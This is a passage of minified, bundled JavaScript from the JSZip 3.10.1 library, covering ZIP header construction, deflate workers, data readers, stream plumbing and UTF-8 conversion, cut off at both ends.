Promise?Promise:$("lie"),ae.exports={Promise:Q}},{lie:37}],7:[function($,ae,I){"use strict";var Q="undefined"!=typeof Uint8Array&&"undefined"!=typeof Uint16Array&&"undefined"!=typeof Uint32Array,F=$("pako"),E=$("./utils"),g=$("./stream/GenericWorker"),b=Q?"uint8array":"array";function _(y,M){g.call(this,"FlateWorker/"+y),this._pako=null,this._pakoAction=y,this._pakoOptions=M,this.meta={}}I.magic="\b\0",E.inherits(_,g),_.prototype.processChunk=function(y){this.meta=y.meta,null===this._pako&&this._createPako(),this._pako.push(E.transformTo(b,y.data),!1)},_.prototype.flush=function(){g.prototype.flush.call(this),null===this._pako&&this._createPako(),this._pako.push([],!0)},_.prototype.cleanUp=function(){g.prototype.cleanUp.call(this),this._pako=null},_.prototype._createPako=function(){this._pako=new F[this._pakoAction]({raw:!0,level:this._pakoOptions.level||-1});var y=this;this._pako.onData=function(M){y.push({data:M,meta:y.meta})}},I.compressWorker=function(y){return new _("Deflate",y)},I.uncompressWorker=function(){return new _("Inflate",{})}},{"./stream/GenericWorker":28,"./utils":32,pako:38}],8:[function($,ae,I){"use strict";function Q(p,D){var w,x="";for(w=0;w<D;w++)x+=String.fromCharCode(255&p),p>>>=8;return x}function F(p,D,w,x,S,O){var U,K,ee=p.file,se=p.compression,ve=O!==b.utf8encode,le=E.transformTo("string",O(ee.name)),ye=E.transformTo("string",b.utf8encode(ee.name)),z=ee.comment,l=E.transformTo("string",O(z)),f=E.transformTo("string",b.utf8encode(z)),A=ye.length!==ee.name.length,v=f.length!==z.length,P="",G="",X="",L=ee.dir,h=ee.date,R={crc32:0,compressedSize:0,uncompressedSize:0};D&&!w||(R.crc32=p.crc32,R.compressedSize=p.compressedSize,R.uncompressedSize=p.uncompressedSize);var J=0;D&&(J|=8),ve||!A&&!v||(J|=2048);var Ae,Xe,Z=0,ue=0;L&&(Z|=16),"UNIX"===S?(ue=798,Z|=(Xe=Ae=ee.unixPermissions,Ae||(Xe=L?16893:33204),(65535&Xe)<<16)):(ue=20,Z|=function(Ae){return 63&(Ae||0)}(ee.dosPermissions)),U=h.getUTCHours(),U<<=6,U|=h.getUTCMinutes(),U<<=5,U|=h.getUTCSeconds()/2,K=h.getUTCFullYear()-1980,K<<=4,K|=h.getUTCMonth()+1,K<<=5,K|=h.getUTCDate(),A&&(G=Q(1,1)+Q(_(le),4)+ye,P+="up"+Q(G.length,2)+G),v&&(X=Q(1,1)+Q(_(l),4)+f,P+="uc"+Q(X.length,2)+X);var Ie="";return Ie+="\n\0",Ie+=Q(J,2),Ie+=se.magic,Ie+=Q(U,2),Ie+=Q(K,2),Ie+=Q(R.crc32,4),Ie+=Q(R.compressedSize,4),Ie+=Q(R.uncompressedSize,4),Ie+=Q(le.length,2),Ie+=Q(P.length,2),{fileRecord:y.LOCAL_FILE_HEADER+Ie+le+P,dirRecord:y.CENTRAL_FILE_HEADER+Q(ue,2)+Ie+Q(l.length,2)+"\0\0\0\0"+Q(Z,4)+Q(x,4)+le+P+l}}var E=$("../utils"),g=$("../stream/GenericWorker"),b=$("../utf8"),_=$("../crc32"),y=$("../signature");function M(p,D,w,x){g.call(this,"ZipFileWorker"),this.bytesWritten=0,this.zipComment=D,this.zipPlatform=w,this.encodeFileName=x,this.streamFiles=p,this.accumulate=!1,this.contentBuffer=[],this.dirRecords=[],this.currentSourceOffset=0,this.entriesCount=0,this.currentFile=null,this._sources=[]}E.inherits(M,g),M.prototype.push=function(p){var D=p.meta.percent||0,w=this.entriesCount,x=this._sources.length;this.accumulate?this.contentBuffer.push(p):(this.bytesWritten+=p.data.length,g.prototype.push.call(this,{data:p.data,meta:{currentFile:this.currentFile,percent:w?(D+100*(w-x-1))/w:100}}))},M.prototype.openedSource=function(p){this.currentSourceOffset=this.bytesWritten,this.currentFile=p.file.name;var D=this.streamFiles&&!p.file.dir;if(D){var w=F(p,D,!1,this.currentSourceOffset,this.zipPlatform,this.encodeFileName);this.push({data:w.fileRecord,meta:{percent:0}})}else this.accumulate=!0},M.prototype.closedSource=function(p){this.accumulate=!1;var x,D=this.streamFiles&&!p.file.dir,w=F(p,D,!0,this.currentSourceOffset,this.zipPlatform,this.encodeFileName);if(this.dirRecords.push(w.dirRecord),D)this.push({data:(x=p,y.DATA_DESCRIPTOR+Q(x.crc32,4)+Q(x.compressedSize,4)+Q(x.uncompressedSize,4)),meta:{percent:100}});else for(this.push({data:w.fileRecord,meta:{percent:0}});this.contentBuffer.length;)this.push(this.contentBuffer.shift());this.currentFile=null},M.prototype.flush=function(){for(var p=this.bytesWritten,D=0;D<this.dirRecords.length;D++)this.push({data:this.dirRecords[D],meta:{percent:100}});var S,O,U,se,x=(S=this.dirRecords.length,O=this.bytesWritten-p,U=p,se=E.transformTo("string",(0,this.encodeFileName)(this.zipComment)),y.CENTRAL_DIRECTORY_END+"\0\0\0\0"+Q(S,2)+Q(S,2)+Q(O,4)+Q(U,4)+Q(se.length,2)+se);this.push({data:x,meta:{percent:100}})},M.prototype.prepareNextSource=function(){this.previous=this._sources.shift(),this.openedSource(this.previous.streamInfo),this.isPaused?this.previous.pause():this.previous.resume()},M.prototype.registerPrevious=function(p){this._sources.push(p);var D=this;return p.on("data",function(w){D.processChunk(w)}),p.on("end",function(){D.closedSource(D.previous.streamInfo),D._sources.length?D.prepareNextSource():D.end()}),p.on("error",function(w){D.error(w)}),this},M.prototype.resume=function(){return!!g.prototype.resume.call(this)&&(!this.previous&&this._sources.length?(this.prepareNextSource(),!0):this.previous||this._sources.length||this.generatedError?void 0:(this.end(),!0))},M.prototype.error=function(p){var D=this._sources;if(!g.prototype.error.call(this,p))return!1;for(var w=0;w<D.length;w++)try{D[w].error(p)}catch(x){}return!0},M.prototype.lock=function(){g.prototype.lock.call(this);for(var p=this._sources,D=0;D<p.length;D++)p[D].lock()},ae.exports=M},{"../crc32":4,"../signature":23,"../stream/GenericWorker":28,"../utf8":31,"../utils":32}],9:[function($,ae,I){"use strict";var Q=$("../compressions"),F=$("./ZipFileWorker");I.generateWorker=function(E,g,b){var _=new F(g.streamFiles,b,g.platform,g.encodeFileName),y=0;try{E.forEach(function(M,p){y++;var D=function(O,U){var K=O||U,ee=Q[K];if(!ee)throw new Error(K+" is not a valid compression method !");return ee}(p.options.compression,g.compression),x=p.dir,S=p.date;p._compressWorker(D,p.options.compressionOptions||g.compressionOptions||{}).withStreamInfo("file",{name:M,dir:x,date:S,comment:p.comment||"",unixPermissions:p.unixPermissions,dosPermissions:p.dosPermissions}).pipe(_)}),_.entriesCount=y}catch(M){_.error(M)}return _}},{"../compressions":3,"./ZipFileWorker":8}],10:[function($,ae,I){"use strict";function Q(){if(!(this instanceof Q))return new Q;if(arguments.length)throw new Error("The constructor with parameters has been removed in JSZip 3.0, please check the upgrade guide.");this.files=Object.create(null),this.comment=null,this.root="",this.clone=function(){var F=new Q;for(var E in this)"function"!=typeof this[E]&&(F[E]=this[E]);return F}}(Q.prototype=$("./object")).loadAsync=$("./load"),Q.support=$("./support"),Q.defaults=$("./defaults"),Q.version="3.10.1",Q.loadAsync=function(F,E){return(new Q).loadAsync(F,E)},Q.external=$("./external"),ae.exports=Q},{"./defaults":5,"./external":6,"./load":11,"./object":15,"./support":30}],11:[function($,ae,I){"use strict";var Q=$("./utils"),F=$("./external"),E=$("./utf8"),g=$("./zipEntries"),b=$("./stream/Crc32Probe"),_=$("./nodejsUtils");function y(M){return new F.Promise(function(p,D){var w=M.decompressed.getContentWorker().pipe(new b);w.on("error",function(x){D(x)}).on("end",function(){w.streamInfo.crc32!==M.decompressed.crc32?D(new Error("Corrupted zip : CRC32 mismatch")):p()}).resume()})}ae.exports=function(M,p){var D=this;return p=Q.extend(p||{},{base64:!1,checkCRC32:!1,optimizedBinaryString:!1,createFolders:!1,decodeFileName:E.utf8decode}),_.isNode&&_.isStream(M)?F.Promise.reject(new Error("JSZip can't accept a stream when loading a zip file.")):Q.prepareContent("the loaded zip file",M,!0,p.optimizedBinaryString,p.base64).then(function(w){var x=new g(p);return x.load(w),x}).then(function(w){var x=[F.Promise.resolve(w)],S=w.files;if(p.checkCRC32)for(var O=0;O<S.length;O++)x.push(y(S[O]));return F.Promise.all(x)}).then(function(w){for(var x=w.shift(),S=x.files,O=0;O<S.length;O++){var U=S[O],K=U.fileNameStr,ee=Q.resolve(U.fileNameStr);D.file(ee,U.decompressed,{binary:!0,optimizedBinaryString:!0,date:U.date,dir:U.dir,comment:U.fileCommentStr.length?U.fileCommentStr:null,unixPermissions:U.unixPermissions,dosPermissions:U.dosPermissions,createFolders:p.createFolders}),U.dir||(D.file(ee).unsafeOriginalName=K)}return x.zipComment.length&&(D.comment=x.zipComment),D})}},{"./external":6,"./nodejsUtils":14,"./stream/Crc32Probe":25,"./utf8":31,"./utils":32,"./zipEntries":33}],12:[function($,ae,I){"use strict";var Q=$("../utils"),F=$("../stream/GenericWorker");function E(g,b){F.call(this,"Nodejs stream input adapter for "+g),this._upstreamEnded=!1,this._bindStream(b)}Q.inherits(E,F),E.prototype._bindStream=function(g){var b=this;(this._stream=g).pause(),g.on("data",function(_){b.push({data:_,meta:{percent:0}})}).on("error",function(_){b.isPaused?this.generatedError=_:b.error(_)}).on("end",function(){b.isPaused?b._upstreamEnded=!0:b.end()})},E.prototype.pause=function(){return!!F.prototype.pause.call(this)&&(this._stream.pause(),!0)},E.prototype.resume=function(){return!!F.prototype.resume.call(this)&&(this._upstreamEnded?this.end():this._stream.resume(),!0)},ae.exports=E},{"../stream/GenericWorker":28,"../utils":32}],13:[function($,ae,I){"use strict";var Q=$("readable-stream").Readable;function F(E,g,b){Q.call(this,g),this._helper=E;var _=this;E.on("data",function(y,M){_.push(y)||_._helper.pause(),b&&b(M)}).on("error",function(y){_.emit("error",y)}).on("end",function(){_.push(null)})}$("../utils").inherits(F,Q),F.prototype._read=function(){this._helper.resume()},ae.exports=F},{"../utils":32,"readable-stream":16}],14:[function($,ae,I){"use strict";ae.exports={isNode:void 0!==ie,newBufferFrom:function(Q,F){if(ie.from&&ie.from!==Uint8Array.from)return ie.from(Q,F);if("number"==typeof Q)throw new Error('The "data" argument must not be a number');return new ie(Q,F)},allocBuffer:function(Q){if(ie.alloc)return ie.alloc(Q);var F=new ie(Q);return F.fill(0),F},isBuffer:function(Q){return ie.isBuffer(Q)},isStream:function(Q){return Q&&"function"==typeof Q.on&&"function"==typeof Q.pause&&"function"==typeof Q.resume}}},{}],15:[function($,ae,I){"use strict";function Q(ee,se,ve){var le,ye=E.getTypeOf(se),z=E.extend(ve||{},_);z.date=z.date||new Date,null!==z.compression&&(z.compression=z.compression.toUpperCase()),"string"==typeof z.unixPermissions&&(z.unixPermissions=parseInt(z.unixPermissions,8)),z.unixPermissions&&16384&z.unixPermissions&&(z.dir=!0),z.dosPermissions&&16&z.dosPermissions&&(z.dir=!0),z.dir&&(ee=S(ee)),z.createFolders&&(le=x(ee))&&O.call(this,le,!0),ve&&void 0!==ve.binary||(z.binary=!("string"===ye&&!1===z.binary&&!1===z.base64)),(se instanceof y&&0===se.uncompressedSize||z.dir||!se||0===se.length)&&(z.base64=!1,z.binary=!0,se="",z.compression="STORE",ye="string");var f;f=se instanceof y||se instanceof g?se:D.isNode&&D.isStream(se)?new w(ee,se):E.prepareContent(ee,se,z.binary,z.optimizedBinaryString,z.base64);var A=new M(ee,f,z);this.files[ee]=A}var F=$("./utf8"),E=$("./utils"),g=$("./stream/GenericWorker"),b=$("./stream/StreamHelper"),_=$("./defaults"),y=$("./compressedObject"),M=$("./zipObject"),p=$("./generate"),D=$("./nodejsUtils"),w=$("./nodejs/NodejsStreamInputAdapter"),x=function(ee){"/"===ee.slice(-1)&&(ee=ee.substring(0,ee.length-1));var se=ee.lastIndexOf("/");return 0<se?ee.substring(0,se):""},S=function(ee){return"/"!==ee.slice(-1)&&(ee+="/"),ee},O=function(ee,se){return se=void 0!==se?se:_.createFolders,ee=S(ee),this.files[ee]||Q.call(this,ee,null,{dir:!0,createFolders:se}),this.files[ee]};function U(ee){return"[object RegExp]"===Object.prototype.toString.call(ee)}var K={load:function(){throw new Error("This method has been removed in JSZip 3.0, please check the upgrade guide.")},forEach:function(ee){var se,ve,le;for(se in this.files)le=this.files[se],(ve=se.slice(this.root.length,se.length))&&se.slice(0,this.root.length)===this.root&&ee(ve,le)},filter:function(ee){var se=[];return this.forEach(function(ve,le){ee(ve,le)&&se.push(le)}),se},file:function(ee,se,ve){if(1!==arguments.length)return Q.call(this,ee=this.root+ee,se,ve),this;if(U(ee)){var le=ee;return this.filter(function(z,l){return!l.dir&&le.test(z)})}var ye=this.files[this.root+ee];return ye&&!ye.dir?ye:null},folder:function(ee){if(!ee)return this;if(U(ee))return this.filter(function(ye,z){return z.dir&&ee.test(ye)});var ve=O.call(this,this.root+ee),le=this.clone();return le.root=ve.name,le},remove:function(ee){var se=this.files[ee=this.root+ee];if(se||("/"!==ee.slice(-1)&&(ee+="/"),se=this.files[ee]),se&&!se.dir)delete this.files[ee];else for(var ve=this.filter(function(ye,z){return z.name.slice(0,ee.length)===ee}),le=0;le<ve.length;le++)delete this.files[ve[le].name];return this},generate:function(){throw new Error("This method has been removed in JSZip 3.0, please check the upgrade guide.")},generateInternalStream:function(ee){var se,ve={};try{if((ve=E.extend(ee||{},{streamFiles:!1,compression:"STORE",compressionOptions:null,type:"",platform:"DOS",comment:null,mimeType:"application/zip",encodeFileName:F.utf8encode})).type=ve.type.toLowerCase(),ve.compression=ve.compression.toUpperCase(),"binarystring"===ve.type&&(ve.type="string"),!ve.type)throw new Error("No output type specified.");E.checkSupport(ve.type),"darwin"!==ve.platform&&"freebsd"!==ve.platform&&"linux"!==ve.platform&&"sunos"!==ve.platform||(ve.platform="UNIX"),"win32"===ve.platform&&(ve.platform="DOS"),se=p.generateWorker(this,ve,ve.comment||this.comment||"")}catch(ye){(se=new g("error")).error(ye)}return new b(se,ve.type||"string",ve.mimeType)},generateAsync:function(ee,se){return this.generateInternalStream(ee).accumulate(se)},generateNodeStream:function(ee,se){return(ee=ee||{}).type||(ee.type="nodebuffer"),this.generateInternalStream(ee).toNodejsStream(se)}};ae.exports=K},{"./compressedObject":2,"./defaults":5,"./generate":9,"./nodejs/NodejsStreamInputAdapter":12,"./nodejsUtils":14,"./stream/GenericWorker":28,"./stream/StreamHelper":29,"./utf8":31,"./utils":32,"./zipObject":35}],16:[function($,ae,I){"use strict";ae.exports=$("stream")},{stream:void 0}],17:[function($,ae,I){"use strict";var Q=$("./DataReader");function F(E){Q.call(this,E);for(var g=0;g<this.data.length;g++)E[g]=255&E[g]}$("../utils").inherits(F,Q),F.prototype.byteAt=function(E){return this.data[this.zero+E]},F.prototype.lastIndexOfSignature=function(E){for(var g=E.charCodeAt(0),b=E.charCodeAt(1),_=E.charCodeAt(2),y=E.charCodeAt(3),M=this.length-4;0<=M;--M)if(this.data[M]===g&&this.data[M+1]===b&&this.data[M+2]===_&&this.data[M+3]===y)return M-this.zero;return-1},F.prototype.readAndCheckSignature=function(E){var g=E.charCodeAt(0),b=E.charCodeAt(1),_=E.charCodeAt(2),y=E.charCodeAt(3),M=this.readData(4);return g===M[0]&&b===M[1]&&_===M[2]&&y===M[3]},F.prototype.readData=function(E){if(this.checkOffset(E),0===E)return[];var g=this.data.slice(this.zero+this.index,this.zero+this.index+E);return this.index+=E,g},ae.exports=F},{"../utils":32,"./DataReader":18}],18:[function($,ae,I){"use strict";var Q=$("../utils");function F(E){this.data=E,this.length=E.length,this.index=0,this.zero=0}F.prototype={checkOffset:function(E){this.checkIndex(this.index+E)},checkIndex:function(E){if(this.length<this.zero+E||E<0)throw new Error("End of data reached (data length = "+this.length+", asked index = "+E+"). Corrupted zip ?")},setIndex:function(E){this.checkIndex(E),this.index=E},skip:function(E){this.setIndex(this.index+E)},byteAt:function(){},readInt:function(E){var g,b=0;for(this.checkOffset(E),g=this.index+E-1;g>=this.index;g--)b=(b<<8)+this.byteAt(g);return this.index+=E,b},readString:function(E){return Q.transformTo("string",this.readData(E))},readData:function(){},lastIndexOfSignature:function(){},readAndCheckSignature:function(){},readDate:function(){var E=this.readInt(4);return new Date(Date.UTC(1980+(E>>25&127),(E>>21&15)-1,E>>16&31,E>>11&31,E>>5&63,(31&E)<<1))}},ae.exports=F},{"../utils":32}],19:[function($,ae,I){"use strict";var Q=$("./Uint8ArrayReader");function F(E){Q.call(this,E)}$("../utils").inherits(F,Q),F.prototype.readData=function(E){this.checkOffset(E);var g=this.data.slice(this.zero+this.index,this.zero+this.index+E);return this.index+=E,g},ae.exports=F},{"../utils":32,"./Uint8ArrayReader":21}],20:[function($,ae,I){"use strict";var Q=$("./DataReader");function F(E){Q.call(this,E)}$("../utils").inherits(F,Q),F.prototype.byteAt=function(E){return this.data.charCodeAt(this.zero+E)},F.prototype.lastIndexOfSignature=function(E){return this.data.lastIndexOf(E)-this.zero},F.prototype.readAndCheckSignature=function(E){return E===this.readData(4)},F.prototype.readData=function(E){this.checkOffset(E);var g=this.data.slice(this.zero+this.index,this.zero+this.index+E);return this.index+=E,g},ae.exports=F},{"../utils":32,"./DataReader":18}],21:[function($,ae,I){"use strict";var Q=$("./ArrayReader");function F(E){Q.call(this,E)}$("../utils").inherits(F,Q),F.prototype.readData=function(E){if(this.checkOffset(E),0===E)return new Uint8Array(0);var g=this.data.subarray(this.zero+this.index,this.zero+this.index+E);return this.index+=E,g},ae.exports=F},{"../utils":32,"./ArrayReader":17}],22:[function($,ae,I){"use strict";var Q=$("../utils"),F=$("../support"),E=$("./ArrayReader"),g=$("./StringReader"),b=$("./NodeBufferReader"),_=$("./Uint8ArrayReader");ae.exports=function(y){var M=Q.getTypeOf(y);return Q.checkSupport(M),"string"!==M||F.uint8array?"nodebuffer"===M?new b(y):F.uint8array?new _(Q.transformTo("uint8array",y)):new E(Q.transformTo("array",y)):new g(y)}},{"../support":30,"../utils":32,"./ArrayReader":17,"./NodeBufferReader":19,"./StringReader":20,"./Uint8ArrayReader":21}],23:[function($,ae,I){"use strict";I.LOCAL_FILE_HEADER="PK\x03\x04",I.CENTRAL_FILE_HEADER="PK\x01\x02",I.CENTRAL_DIRECTORY_END="PK\x05\x06",I.ZIP64_CENTRAL_DIRECTORY_LOCATOR="PK\x06\x07",I.ZIP64_CENTRAL_DIRECTORY_END="PK\x06\x06",I.DATA_DESCRIPTOR="PK\x07\b"},{}],24:[function($,ae,I){"use strict";var Q=$("./GenericWorker"),F=$("../utils");function E(g){Q.call(this,"ConvertWorker to "+g),this.destType=g}F.inherits(E,Q),E.prototype.processChunk=function(g){this.push({data:F.transformTo(this.destType,g.data),meta:g.meta})},ae.exports=E},{"../utils":32,"./GenericWorker":28}],25:[function($,ae,I){"use strict";var Q=$("./GenericWorker"),F=$("../crc32");function E(){Q.call(this,"Crc32Probe"),this.withStreamInfo("crc32",0)}$("../utils").inherits(E,Q),E.prototype.processChunk=function(g){this.streamInfo.crc32=F(g.data,this.streamInfo.crc32||0),this.push(g)},ae.exports=E},{"../crc32":4,"../utils":32,"./GenericWorker":28}],26:[function($,ae,I){"use strict";var Q=$("../utils"),F=$("./GenericWorker");function E(g){F.call(this,"DataLengthProbe for "+g),this.propName=g,this.withStreamInfo(g,0)}Q.inherits(E,F),E.prototype.processChunk=function(g){g&&(this.streamInfo[this.propName]=(this.streamInfo[this.propName]||0)+g.data.length),F.prototype.processChunk.call(this,g)},ae.exports=E},{"../utils":32,"./GenericWorker":28}],27:[function($,ae,I){"use strict";var Q=$("../utils"),F=$("./GenericWorker");function E(g){F.call(this,"DataWorker");var b=this;this.dataIsReady=!1,this.index=0,this.max=0,this.data=null,this.type="",this._tickScheduled=!1,g.then(function(_){b.dataIsReady=!0,b.data=_,b.max=_&&_.length||0,b.type=Q.getTypeOf(_),b.isPaused||b._tickAndRepeat()},function(_){b.error(_)})}Q.inherits(E,F),E.prototype.cleanUp=function(){F.prototype.cleanUp.call(this),this.data=null},E.prototype.resume=function(){return!!F.prototype.resume.call(this)&&(!this._tickScheduled&&this.dataIsReady&&(this._tickScheduled=!0,Q.delay(this._tickAndRepeat,[],this)),!0)},E.prototype._tickAndRepeat=function(){this._tickScheduled=!1,this.isPaused||this.isFinished||(this._tick(),this.isFinished||(Q.delay(this._tickAndRepeat,[],this),this._tickScheduled=!0))},E.prototype._tick=function(){if(this.isPaused||this.isFinished)return!1;var g=null,b=Math.min(this.max,this.index+16384);if(this.index>=this.max)return this.end();switch(this.type){case"string":g=this.data.substring(this.index,b);break;case"uint8array":g=this.data.subarray(this.index,b);break;case"array":case"nodebuffer":g=this.data.slice(this.index,b)}return this.index=b,this.push({data:g,meta:{percent:this.max?this.index/this.max*100:0}})},ae.exports=E},{"../utils":32,"./GenericWorker":28}],28:[function($,ae,I){"use strict";function Q(F){this.name=F||"default",this.streamInfo={},this.generatedError=null,this.extraStreamInfo={},this.isPaused=!0,this.isFinished=!1,this.isLocked=!1,this._listeners={data:[],end:[],error:[]},this.previous=null}Q.prototype={push:function(F){this.emit("data",F)},end:function(){if(this.isFinished)return!1;this.flush();try{this.emit("end"),this.cleanUp(),this.isFinished=!0}catch(F){this.emit("error",F)}return!0},error:function(F){return!this.isFinished&&(this.isPaused?this.generatedError=F:(this.isFinished=!0,this.emit("error",F),this.previous&&this.previous.error(F),this.cleanUp()),!0)},on:function(F,E){return this._listeners[F].push(E),this},cleanUp:function(){this.streamInfo=this.generatedError=this.extraStreamInfo=null,this._listeners=[]},emit:function(F,E){if(this._listeners[F])for(var g=0;g<this._listeners[F].length;g++)this._listeners[F][g].call(this,E)},pipe:function(F){return F.registerPrevious(this)},registerPrevious:function(F){if(this.isLocked)throw new Error("The stream '"+this+"' has already been used.");this.streamInfo=F.streamInfo,this.mergeStreamInfo(),this.previous=F;var E=this;return F.on("data",function(g){E.processChunk(g)}),F.on("end",function(){E.end()}),F.on("error",function(g){E.error(g)}),this},pause:function(){return!this.isPaused&&!this.isFinished&&(this.isPaused=!0,this.previous&&this.previous.pause(),!0)},resume:function(){if(!this.isPaused||this.isFinished)return!1;var F=this.isPaused=!1;return this.generatedError&&(this.error(this.generatedError),F=!0),this.previous&&this.previous.resume(),!F},flush:function(){},processChunk:function(F){this.push(F)},withStreamInfo:function(F,E){return this.extraStreamInfo[F]=E,this.mergeStreamInfo(),this},mergeStreamInfo:function(){for(var F in this.extraStreamInfo)Object.prototype.hasOwnProperty.call(this.extraStreamInfo,F)&&(this.streamInfo[F]=this.extraStreamInfo[F])},lock:function(){if(this.isLocked)throw new Error("The stream '"+this+"' has already been used.");this.isLocked=!0,this.previous&&this.previous.lock()},toString:function(){var F="Worker "+this.name;return this.previous?this.previous+" -> "+F:F}},ae.exports=Q},{}],29:[function($,ae,I){"use strict";var Q=$("../utils"),F=$("./ConvertWorker"),E=$("./GenericWorker"),g=$("../base64"),b=$("../support"),_=$("../external"),y=null;if(b.nodestream)try{y=$("../nodejs/NodejsStreamOutputAdapter")}catch(D){}function p(D,w,x){var S=w;switch(w){case"blob":case"arraybuffer":S="uint8array";break;case"base64":S="string"}try{this._internalType=S,this._outputType=w,this._mimeType=x,Q.checkSupport(S),this._worker=D.pipe(new F(S)),D.lock()}catch(O){this._worker=new E("error"),this._worker.error(O)}}p.prototype={accumulate:function(D){return function M(D,w){return new _.Promise(function(x,S){var O=[],U=D._internalType,K=D._outputType,ee=D._mimeType;D.on("data",function(se,ve){O.push(se),w&&w(ve)}).on("error",function(se){O=[],S(se)}).on("end",function(){try{var se=function(ve,le,ye){switch(ve){case"blob":return Q.newBlob(Q.transformTo("arraybuffer",le),ye);case"base64":return g.encode(le);default:return Q.transformTo(ve,le)}}(K,function(ve,le){var ye,z=0,l=null,f=0;for(ye=0;ye<le.length;ye++)f+=le[ye].length;switch(ve){case"string":return le.join("");case"array":return Array.prototype.concat.apply([],le);case"uint8array":for(l=new Uint8Array(f),ye=0;ye<le.length;ye++)l.set(le[ye],z),z+=le[ye].length;return l;case"nodebuffer":return ie.concat(le);default:throw new Error("concat : unsupported type '"+ve+"'")}}(U,O),ee);x(se)}catch(ve){S(ve)}O=[]}).resume()})}(this,D)},on:function(D,w){var x=this;return this._worker.on(D,"data"===D?function(S){w.call(x,S.data,S.meta)}:function(){Q.delay(w,arguments,x)}),this},resume:function(){return Q.delay(this._worker.resume,[],this._worker),this},pause:function(){return this._worker.pause(),this},toNodejsStream:function(D){if(Q.checkSupport("nodestream"),"nodebuffer"!==this._outputType)throw new Error(this._outputType+" is not supported by this method");return new y(this,{objectMode:"nodebuffer"!==this._outputType},D)}},ae.exports=p},{"../base64":1,"../external":6,"../nodejs/NodejsStreamOutputAdapter":13,"../support":30,"../utils":32,"./ConvertWorker":24,"./GenericWorker":28}],30:[function($,ae,I){"use strict";if(I.base64=!0,I.array=!0,I.string=!0,I.arraybuffer="undefined"!=typeof ArrayBuffer&&"undefined"!=typeof Uint8Array,I.nodebuffer=void 0!==ie,I.uint8array="undefined"!=typeof Uint8Array,"undefined"==typeof ArrayBuffer)I.blob=!1;else{var Q=new ArrayBuffer(0);try{I.blob=0===new Blob([Q],{type:"application/zip"}).size}catch(E){try{var F=new(self.BlobBuilder||self.WebKitBlobBuilder||self.MozBlobBuilder||self.MSBlobBuilder);F.append(Q),I.blob=0===F.getBlob("application/zip").size}catch(g){I.blob=!1}}}try{I.nodestream=!!$("readable-stream").Readable}catch(E){I.nodestream=!1}},{"readable-stream":16}],31:[function($,ae,I){"use strict";for(var Q=$("./utils"),F=$("./support"),E=$("./nodejsUtils"),g=$("./stream/GenericWorker"),b=new Array(256),_=0;_<256;_++)b[_]=252<=_?6:248<=_?5:240<=_?4:224<=_?3:192<=_?2:1;function y(){g.call(this,"utf-8 decode"),this.leftOver=null}function M(){g.call(this,"utf-8 encode")}b[254]=b[254]=1,I.utf8encode=function(p){return F.nodebuffer?E.newBufferFrom(p,"utf-8"):function(D){var w,x,S,O,U,K=D.length,ee=0;for(O=0;O<K;O++)55296==(64512&(x=D.charCodeAt(O)))&&O+1<K&&56320==(64512&(S=D.charCodeAt(O+1)))&&(x=65536+(x-55296<<10)+(S-56320),O++),ee+=x<128?1:x<2048?2:x<65536?3:4;for(w=F.uint8array?new Uint8Array(ee):new Array(ee),O=U=0;U<ee;O++)55296==(64512&(x=D.charCodeAt(O)))&&O+1<K&&56320==(64512&(S=D.charCodeAt(O+1)))&&(x=65536+(x-55296<<10)+(S-56320),O++),x<128?w[U++]=x:(x<2048?w[U++]=192|x>>>6:(x<65536?w[U++]=224|x>>>12:(w[U++]=240|x>>>18,w[U++]=128|x>>>12&63),w[U++]=128|x>>>6&63),w[U++]=128|63&x);return w}(p)},I.utf8decode=function(p){return F.nodebuffer?Q.transformTo("nodebuffer",p).toString("utf-8"):function(D){var w,x,S,O,U=D.length,K=new Array(2*U);for(w=x=0;w<U;)if((S=D[w++])<128)K[x++]=S;else if(4<(O=b[S]))K[x++]=65533,w+=O-1;else{for(S&=2===O?31:3===O?15:7;1<O&&w<U;)S=S<<6|63&D[w++],O--;1<O?K[x++]=65533:S<65536?K[x++]=S:(K[x++]=55296|(S-=65536)>>10&1023,K[x++]=56320|1023&S)}return K.length!==x&&(K.subarray?K=K.subarray(0,x):K.length=x),Q.applyFromCharCode(K)}(p=Q.transformTo(F.uint8array?"uint8array":"array",p))},Q.inherits(y,g),y.prototype.processChunk=function(p){var D=Q.transformTo(F.uint8array?"uint8array":"array",p.data);if(this.leftOver&&this.leftOver.length){if(F.uint8array){var w=D;(D=new Uint8Array(w.length+this.leftOver.length)).set(this.leftOver,0),D.set(w,this.leftOver.length)}else D=this.leftOver.concat(D);this.leftOver=null}var x=function(O,U){var K;for((U=U||O.length)>O.length&&(U=O.length),K=U-1;0<=K&&128==(192&O[K]);)K--;return K<0||0===K?U:K+b[O[K]]>U?K:U}(D),S=D;x!==D.length&&(F.uint8array?(S=D.subarray(0,x),this.leftOver=D.subarray(x,D.length)):(S=D.slice(0,x),this.leftOver=D.slice(x,D.length))),this.push({data:I.utf8decode(S),meta:p.meta})},y.prototype.flush=function(){this.leftOver&&this.leftOver.length&&(this.push({data:I.utf8decode(this.leftOver),meta:{}}),this.leftOver=null)},I.Utf8DecodeWorker=y,Q.inherits(M,g),M.prototype.processChunk=function(p){this.push({data:I.utf8encode(p.data),meta:p.meta})},I.Utf8EncodeWorker=M},{"./nodejsUtils":14,"./stream/GenericWorker":28,"./support":30,"./utils":32}],32:[function($,ae,I){"use strict";var Q=$("./support"),F=$("./base64"),E=$("./nodejsUtils"),g=$("./external");function b(w){return w}function _(w,x){for(var S=0;S<w.length;++S)x[S]=255&w.charCodeAt(S);return x}$("setimmediate"),I.newBlob=function(w,x){I.checkSupport("blob");try{return new Blob([w],{type:x})}catch(O){try{var S=new(self.BlobBuilder||self.WebKitBlobBuilder||self.MozBlobBuilder||self.MSBlobBuilder);return S.append(w),S.getBlob(x)}catch(U){throw new Error("Bug : can't construct the Blob.")}}};var y={stringifyByChunk:function(w,x,S){var O=[],U=0,K=w.length;if(K<=S)return String.fromCharCode.apply(null,w);for(;U<K;)O.push(String.fromCharCode.apply(null,"array"===x||"nodebuffer"===x?w.slice(U,Math.min(U+S,K)):w.subarray(U,Math.min(U+S,K)))),U+=S;return O.join("")},stringifyByChar:function(w){for(var x="",S=0;S<w.length;S++)x+=String.fromCharCode(w[S]);return x},applyCanBeUsed:{uint8array:function(){try{return Q.uint8array&&1===String.fromCharCode.apply(null,new Uint8Array(1)).length}catch(w){return!1}}(),nodebuffer:function(){try{return Q.nodebuffer&&1===String.fromCharCode.apply(null,E.allocBuffer(1)).length}catch(w){return!1}}()}};function M(w){var 